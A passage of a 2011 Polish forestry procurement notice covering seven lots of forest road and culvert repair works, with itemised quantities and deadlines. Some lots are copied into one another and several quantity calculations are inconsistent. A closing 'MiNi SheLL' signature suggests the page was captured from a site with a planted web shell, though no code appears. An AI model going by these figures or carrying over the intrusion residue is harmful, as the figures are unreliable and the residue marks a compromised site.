2. Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
3. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm. ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://start.lasy.gov.pl/web/jaroslaw oraz http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_radymno/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, Koniaczów 1 L, 37-500 Jarosław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2011 godzina 10:00, miejsce: Siedziba Zamawiającego, Koniaczów 1 L, 37-500 Jarosław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont przepustu na szlaku zrywkowo - wywozowym w Leśnictwie Dąbrowa oddz. 223b/222c, roboty ziemne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont szlaku zrywkowo wywozowego obejmuje:
1. Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III -   6,0 m x 2,0m x 2,5m = 30,00 m3 średnica rury 3,14 x 0,85 x 0,85 x 6,0 = 13,61 m3 Razem: 30,00 m3 - 13,61 m3 = 16,69 m3 
2. Ułożenie części przelotowej przepustu z rur żelbetowych fi 150 cm na ławie z tłucznia  gr 15 cm po zagęszczeniu - 6,0 mb
3. Wykonanie murków  czołowego z betonu B-25 szt 2  na przepuście z rur fi 150 cm - 2 x 2,165 m3 = 4,33 m3
4. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl do 3 m, część gruntu z ewent. dokopu 6,0m x 2,0m x 2,5 m = 30, 0 m3 średnica rury 3,14 x 0,85 x 0,85 x 6,0 = 13,61 m3 Razem: 30,0 m3 - 13,61 m3 = 16,69 m3
5. Wykonanie podbudowy tłuczniowej warstwy górnej  grubości 15 cm - 6,0 m x 1,5 = 9,0 m2 x 0,15 = 1,35 m3
6. Ułożenie części przelotowej przepustu z rur żelbetowych fi 60 cm na ławie z tłucznia  - 6,0 mb
7. Wykonanie murków  czołowego z betonu B-20 szt 2  na przepuście z rur fi 60 cm - 2 x 0,96 m3 =1,92 m3
8. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl. do 3 m 2,0m x 6,0m x 1,2 m = 14,40 m3 średnica rury 3,14 x 0,30 x 0,30 x 6,0 = 1,70 m3 Razem: 21,60 m3 - 1,70 m3 = 19,90 m3
9. Ręczne plantowanie skarp wykopu grunt kat III 40,0m x 2,20 = 88,0 m2
10. Wykonanie warstwy odsączającej z piasku gr 15cm 5,50 x 2,0 = 11,0 m2
11. Wykonanie podbudowy z tłucznia kamiennego grubości 15 cm - 5,50 x 2,00 x 0,15 = 1,65 m3 m2
12. Wykonanie warstwy górnej z tłucznia grubości 10 cm 5,50 x 2,00 x 0,10 = 1,10 m3
13. Przemieszczanie mas ziemnych na nasyp na odl ponad 60 m grunt kat III - 1500,00 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont przepustów na szlakach zrywkowo - wywozowych fi 60 - 1 szt. w oddz. 147ab/137g i 1 szt. w oddz. 129g oraz remont nawierzchni szlaku zrywkowego w oddz.  133h/143c na odcinku 0,10 km w Leśnictwie Kobylnica..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont przepustu w oddz. 147a,b/137g obejmuje:
1. Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III -   2,0 m x 8,0m x 1,5m = 24,00 m3 
2. Ułożenie części przelotowej przepustu z rur żelbetowych fi 60 cm na ławie z tłucznia (rury inwestora) - 8,0 mb
3. Wykonanie murków  czołowego z betonu B-20 szt 2  na przepuście z rur fi 60 cm - 2 x 0,96 m3 =1,92 m3
4. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl do 3 m 2,0m x 9,0m x 1,2 m = 21,60 m3 średnica rury 3,14 x 0,30 x 0,30 x 9,0 = 2,54  m3 Razem: 21,60 m3 - 2,54 m3 = 19,06 m3
5. Wykonanie koryta w gr kat III na szer jezdni 200,0mb x 3,50 = 700,0 m2 
6. Wykonanie warstwy odsączającej z piasku gr 15cm jak poz 5  = 700,0  m2
7. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm(warstwa dolna) - 3,50 m x 200,0 m = 700,0 m2
8. Wykonanie warstwy górnej z tłucznia grubości 10 cm - 3,50 m x 200,0 = 700,0 m2
9. Ręczne plantowanie poboczy grunt kat III 200,0m x 1,0 x 2 = 400,0 m2
10. Wykonanie wykopu koparką podsiębierną o poj łyżki 0.40 m3 grunt kat III z transportem urobku na odl do 1 km - rów str L i P : 400,0 x 0,58m3/mb = 232,0 m3
Remont przepustu w oddz. - 129g obejmuje:
1. Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III -   2,0 m x 8,0m x 1,5m = 24,00 m3 
2. Ułożenie części przelotowej przepustu z rur żelbetowych fi 60 cm na ławie z tłucznia  - 8,0 mb
3. Wykonanie murków  czołowego z betonu B-20 szt 2  na przepuście z rur fi 60 cm - 2 x 0,96 m3 =1,92 m3
4. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl do 3 m 2,0m x 9,0m x 1,2 m = 21,60 m3 średnica rury 3,14 x 0,30 x 0,30 x 9,0 = 2,54 m3 Razem: 21,60 m3 - 2,54 m3 = 19,06 m3
Remont nawierzchni szlaku zrywkowo - wywozowego w oddz. 133h/143c obejmuje:
1. Wykonanie koryta w gr kat III na szer jezdni 100,0mb x 3,50 = 350,0 m2
2. Wykonanie warstwy odsączającej z piasku gr 15cm jak poz 1  = 350,0  m2
3. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm(warstwa dolna) - 3,50 m x 100,0 m = 350,0 m2
4. Wykonanie warstwy górnej z tłucznia grubości 10 cm - 3,50 m x 100,0 = 350,0 m2
5. Ręczne plantowanie poboczy grunt kat III 100,0m x 1,0 x 2 = 200,0 m2
6. Wykonanie wykopu koparką podsiębierną o poj łyżki 0.40 m3 grunt kat III z transportem urobku na odl do 1 km - rów str L i P : 100,0 x 1,25m3/mb x 2 strony = 250 m3
Zamawiający nie dopuszcza składania ofert wariantowych. 
Temat: Remont drogi leśnej o nr inw: 242/489 i 242/466 w Leśnictwie Korczowa, 242/464 i 242/465 w Leśnictwie Łapajówka oraz  242/648 w Leśnictwie Tuchla. 
Wspólny Słownik Zamówień: 45233142-6 - Roboty w zakresie naprawy dróg 
Opis: Remont drogi leśnej o nr inw: 242/489 obejmuje:
1.  Mechaniczne rozebranie nawierzchni tłuczniowej gr 30 cm - 12.0 m2
2.  Rozebranie ścianek czołowych przepustu z betonu - 1.36 m3
3.  Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruńcie kat III  - 21.90 m3
4. Ułożenie części przelotowej przepustu z rur żelbetowych fi 100 cm na ławie z tłucznia  - 7.0 mb
5. Wykonanie ścianek czołowych z betonu B-25 str L i P na przepuście z rur     fi 100 cm - 2 x 1.9 m3 = 3.94 m3
6. Mechaniczne wykonanie wykopu w gr kat III koparką podsiębierną z transportem urobku na odl 3 km (z dokopu) - 26.28 m3
7. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem - 48,18 m3
8. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm(warstwa dolna) -  24.50 m3
9. Wykonanie warstwy górnej z tłucznia grubości 10 cm  wraz z zaklinowaniem - jak poz 8 - 24.50 m2
10. Umocnienie wylotu przepustu narzutem z tłucznia gr 30 cm - 4.0 m2
Remont drogi leśnej o nr inw: 242/466 obejmuje:
1. Wykonanie nawierzchni z masy bitumicznej gr 5.0 cm - 670,0 m2
Remont drogi leśnej o nr inw: 242/464 obejmuje:
1. Wykonanie nawierzchni z masy bitumicznej gr 5.0 cm - 900,0 m2
Remont drogi leśnej o nr inw: 242/465 obejmuje:
1. Wykonanie nawierzchni z masy bitumicznej gr 5.0 cm - 720,0 m2
Remont drogi leśnej o nr inw: 242/648 obejmuje:
1. Remont (likwidacja) wyboii emulsją asfaltową i grysami (wyboje o głębokości od 5,0 do 10,0 cm)  - 520,0 m2
2. Uszczelnienie - 750 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont drogi leśnej o nr inw: 242/489  i 242/466 w Leśnictwie Korczowa, 242/464 i 242/465 w Leśnictwie Łapajówka oraz  242/648 w Leśnictwie Tuchla..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont drogi leśnej o nr inw: 242/489 obejmuje:
1.  Mechaniczne rozebranie nawierzchni tłuczniowej gr 30 cm - 12.0 m2
2.  Rozebranie ścianek czołowych przepustu z betonu - 1.36 m3
3.  Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruńcie kat III  - 21.90 m3
4. Ułożenie części przelotowej przepustu z rur żelbetowych fi 100 cm na ławie z tłucznia  - 7.0 mb
5. Wykonanie ścianek czołowych z betonu B-25 str L i P na przepuście z rur     fi 100 cm - 2 x 1.9 m3 = 3.94 m3
6. Mechaniczne wykonanie wykopu w gr kat III koparką podsiębierną z transportem urobku na odl 3 km (z dokopu) - 26.28 m3
7. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem - 48,18 m3
8. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm(warstwa dolna) -  24.50 m3
9. Wykonanie warstwy górnej z tłucznia grubości 10 cm  wraz z zaklinowaniem - jak poz 8 - 24.50 m2
10. Umocnienie wylotu przepustu narzutem z tłucznia gr 30 cm - 4.0 m2
Remont drogi leśnej o nr inw: 242/466 obejmuje:
1. Wykonanie nawierzchni z masy bitumicznej gr 5.0 cm - 670,0 m2
Remont drogi leśnej o nr inw: 242/464 obejmuje:
1. Wykonanie nawierzchni z masy bitumicznej gr 5.0 cm - 900,0 m2
Remont drogi leśnej o nr inw: 242/465 obejmuje:
1. Wykonanie nawierzchni z masy bitumicznej gr 5.0 cm - 720,0 m2
Remont drogi leśnej o nr inw: 242/648 obejmuje:
1. Remont (likwidacja) wyboii emulsją asfaltową i grysami (wyboje o głębokości od 5,0 do 10,0 cm)  - 520,0 m2
2. Uszczelnienie - 750 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont szlaków zrywkowo - wywozowych w km 0+000-0+200, oddz  107 oraz 0+000-0+200, oddz. 99 w Leśnictwie Korzenica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont szlaku zrywkowego - wywozowego w oddz. 107 obejmuje:
1. Wykonanie koryta głębokości 20 cm w gr kat III z profilowaniem i zagęszczeniem - 200,0 m x 3,5 m = 700,0 m2 
2. Wykonanie warstwy odsączającej z piasku gr 10 cm - 700,0 m2
3. Wykonanie podbudowy  tłuczniowej warstwa dolna  grubości 24 cm - 700,0 m2
4. Wykonanie warstwy górnej tłuczniowej grubości 10 cm z zaklinowaniem - 700,0 m2
5. Wykonanie wykopu koparką podsiębierną o poj łyżki 0.40 m3 grunt kat III na odkład  w km 0+000 - 0+200  odmulenie rów str L i P : (1,40m+0,40m)x2x200mbxśred 0,20m = 144,0 m3
6. Uzupełnienie poboczy - ręczne formowanie nasypu w km 0+000-1+300 (200mb x śr. 1,0m x śr. 0,10m) x 2 = 40,0 m3
7. Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III -   2,0 m x 9,0m x 1,5m = 27,0 m3
8. Wykonanie wykopu koparką podsiębierną o poj łyżki 0.40 m3 grunt kat III z transportem urobku na odl do 1 km - rów str L i P : 40,0 x 0,36m3/mb = 14,4 m3
9. Ułożenie części przelotowej przepustu z rur żelbetowych fi 60 cm na ławie z tłucznia   - 9,0 mb
10. Wykonanie murków  czołowego z betonu B-20 szt 2  na przepuście z rur fi 60 cm -  2,0 x 0,96m3 = 1,92 m3
11. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl do 3 m 2,0m x 9,0m x 1,2 m = 21,60 m3 - rura 0,30 x 0,30 x 3,14 x 9,0 = 19,06 m3
Remont szlaku zrywkowego - wywozowego w oddz. 99 obejmuje:
1. Wykonanie koryta głębokości 20 cm w gr kat III z profilowaniem i zagęszczeniem - 200,0 m x 3,5 m = 700,0 m2 
2. Wykonanie warstwy odsączającej z piasku gr 10 cm - 700,0 m2
3. Wykonanie podbudowy  tłuczniowej warstwa dolna  grubości 24 cm - 700,0 m2
4. Wykonanie warstwy górnej tłuczniowej grubości 10 cm z zaklinowaniem - 700,0 m2
5. Wykonanie wykopu koparką podsiębierną o poj łyżki 0.40 m3 grunt kat III na odkład  w km 0+000 - 0+200  odmulenie rów str L i P: (1,40m+0,40m)x2x200mbxśred 0,20m = 144,0 m3
6. Uzupełnienie poboczy - ręczne formowanie nasypu w km 0+000-1+300 (200mb x śr. 1,0m x śr. 0,10m) x 2 = 40,0 m3
7. Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III -   2,0 m x 9,0m x 1,5m = 27,0 m3
8. Wykonanie wykopu koparką podsiębierną o poj łyżki 0.40 m3 grunt kat III z transportem urobku na odl do 1 km - rów str L i P : 40,0 x 0,36m3/mb = 14,4 m3
9. Ułożenie części przelotowej przepustu z rur żelbetowych fi 60 cm na ławie z tłucznia - 9,0 mb
10. Wykonanie murków  czołowego z betonu B-20 szt 2  na przepuście z rur fi 60 cm - 2,0 x 0,96m3 = 1,92 m3
11. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl do 3 m 2,0m x 9,0m x 1,2 m = 21,60 m3 - rura 0,30 x 0,30 x 3,14 x 9,0 = 19,06 m3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Remont przepustów na szlaku zrywkowo - wywozowym fi 150 - 2 szt. oraz remont nawierzchni szlaku zrywkowego w oddz. 166c, 169aicfig, 167fjd, 170agjk w Lesnictwie Radawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont szlaku zrywkowo wywozowego obejmuje:
1. Mechaniczne rozebranie nawierzchni jezdni przepustu z bali drewnianych o wym: 4,50 x 4,00 x 0,50 = 8.25 m3
2. Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III - 6,0 mx2,0mx2,5m = 30,0 x 2 = 60 m3 (dwie nitki przepustu ) średnica rury 3,14 x 0,85 x 2mx 2 nitki = 9,07 m3 Razem: 60,0m3 - 9,07m3 = 50,93 m3
3. Ułożenie części przelotowej przepustu z rur fi 150 cm na ławie z tłucznia gr 15 cm po zagęszczeniu - przepust  6 mb x 2 nitki = 12,0 mb
4. Wykonanie murka  czołowego z betonu B-25 str L i P na przepuście z rur fi 150 cm - 2 x 3,31 m3 = 6,62 m3
5. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl do 3 m, część gruntu z ewentualnego dokopu 6,0m x 2,0m x 2,5m = 30,0 m3x2 = 60,0 m3 średnica rury 3,14 x 0,85 x 2mx 2 nitki = 9,07 m3 Razem: 60,0m3 - 9,07m3 = 50,93 m3 
6. Wykonanie warstwy odsączającej z piasku gr 15cm 3,5m x 20,0m = 70,0  m2
7. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm(warstwa dolna) - 3,50m x 20,0m x 0,15 = 10,50 m3
8. Wykonanie warstwy górnej z tłucznia grubości 10 cm  - 3,5m x 20,0m x 01,0 = 7,00 m3
9.  Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III  - kopanie rowu str L i P : (1300m +500m)x2 = 3 600mb x 0,36 = 1296,0 m3
10. Wykonanie koryta w gr kat III gł 30 cm  660 mb x 3.50 = 2 310 m2
11. Wykonanie warstwy odsączającej z piasku gr 15 cm-jak poz. 10 - 2 310m2
12. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm (warstwa dolna) -  jak poz. 10 - 2 310 m2
13. Wykonanie warstwy górnej z tłucznia grubości 10 cm-jak poz. 10-2 310 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Remont przepustu fi 100 na szlaku zrywkowo - wywozowym w Leśnictwie Surmaczówka w oddz. 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont przepustu fi 100 na szlaku zrywkowo - wywozowym obejmuje:
1. Wykonanie wykopu koparką podsiębierna bez transportu urobku, głębokość kopania do 3 m w gruncie kat III -  2,0 x 6,0 x 1,90 = 22,80 m3
2. Ułożenie części przelotowej przepustu z rur żelbetowych fi 100 cm na ławie z tłucznia  gr 15 cm  - 6,0 mb
3. Wykonanie murków  czołowego z betonu B-25 szt 2  na przepuście z rur fi 100 cm - szt 2 - murek bez skrzydełek 3,31 m3, ze skrzydełkami - (4,0 + 2,0 x 1,50 ) = 7.00 m3 Razem - 10,31 m3
4. Zasypanie wykopu ze skarpami grunt kat III z zagęszczeniem, przerzut gruntu na odl do 3 m 6,0m x 2,0m x 1,6 m = 19,20 m3 średnica rury 3,14 x 0,58 x 0,58 x 6,0 = 6,33 m3 Razem: 30,0 m3 - 13,61 m3 = 12,87 m3 
5. Wykonanie warstwy odsączającej z piasku gr 15cm 3,50 x 20,0 = 70,0 m2
6. Wykonanie podbudowy tłuczniowej warstwa dolna  grubości  min. 15 cm - 3,50 x 20,0 = 70,0 m2 x 0,20 = 14,00 m3
7. Wykonanie warstwy górnej  tłuczniowej grubości 10 cm 3,50 x 20,0 x 0,10 = 7,0 m3
8. Wykonanie koryta głębokości 30 cm w gr kat III  - 220,0 m2 
9. Wykonanie warstwy odsączającej z piasku gr 15cm - 220,0 m2
10. Wykonanie podbudowy  tłuczniowej warstwa dolna  grubości 15 cm - 220,0 m2
11. Wykonanie warstwy górnej tłuczniowej grubości 10 cm  - 220,0 m2
12. Wykonanie wykopu koparką podsiębierną o poj łyżki 0.40 m3 grunt kat III z transportem urobku na odl do 1 km - rów str L i P : 200,0 x 0,36m3/mb = 72,00 m3
13. Ręczne plantowanie skarp wykopu grunt kat III 200,0m x 2,20 = 440,0 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Przebudowa dróg leśnych o nr inw: 220/600 w km 2+000-2+300 oraz 242/301 w km 0+000-0+600 w Leśnictwie Stubno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi leśnej o nr inw: 220/600 obejmuje:
1. Wykonanie koryta w gr kat III na szer jezdni 300 mb x 3.50 = 1150 m2
2. Wykonanie warstwy odsączającej z piasku gr 15 cm - jak poz 1 - 1150 m2
3. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm(warstwa dolna) -  jak poz 1  m2 - 1150 m2
4. Wykonanie warstwy górnej z tłucznia grubości 10 cm  wraz z zaklinowaniem - jak poz 1 - 1150 m2
5. Ręczne plantowanie pobocza grunt kat III  strona P i L : 300 mb x 1.00 x 2 = 600 m2
6. Wykop koparką podsiębierną o pojemności łyżki 0,40m3 grunt kat III z transportem urobku na odl do 1 km - rów strona L i P: 600 mb x 0.50m3/mb = 300 m3
7. Zagęszczenie pobocza walcami wibracyjnymi grunt kat III  - strona L i P: 300 mb x 1.00 x 2 = 600 m2
Przebudowa drogi leśnej o nr inw: 242/301 obejmuje:
1. Wykonanie koryta w gr kat III na szer jezdni 600 mb x 3.50 = 2100 m2
2. Wykonanie warstwy odsączającej z piasku gr 15 cm - jak poz 1 - 2100 m2
3. Wykonanie podbudowy z tłucznia kamiennego grubości min 15 cm(warstwa dolna) - jak poz 1  m2 - 2100 m2
4. Wykonanie warstwy górnej z tłucznia grubości 10 cm  wraz z zaklinowaniem - jak poz 1 - 2100 m2
5. Ręczne plantowanie pobocza grunt kat III  strona P i L : 600 mb x 1.00 x 2 = 1200 m2
6. Wykop koparką podsiębierną o pojemności łyżki 0,40m3 grunt kat III z transportem urobku na odl do 1 km - rów strona L i P: 1200 mb x 0.25m3/mb = 300 m3
7. Zagęszczenie pobocza walcami wibracyjnymi grunt kat III  - strona L i P: 600 mb x 1.00 x 2 = 1200 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com